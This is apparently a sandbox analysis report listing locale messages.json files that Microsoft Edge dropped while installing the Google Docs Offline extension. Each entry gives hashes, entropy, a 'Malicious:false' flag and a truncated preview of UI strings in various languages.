                                                                                                                                                                                                                                                                                          SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                          SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                          MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                          SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                          SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                          SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                          MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                          SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                          SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                          SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):936
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                          MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                          SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                          SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                          SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1898
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                          MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                          SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                          SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                          SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):907
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                          MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                          SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                          SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                          SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                          MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                          SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                          SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                          SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                          Malicious:false
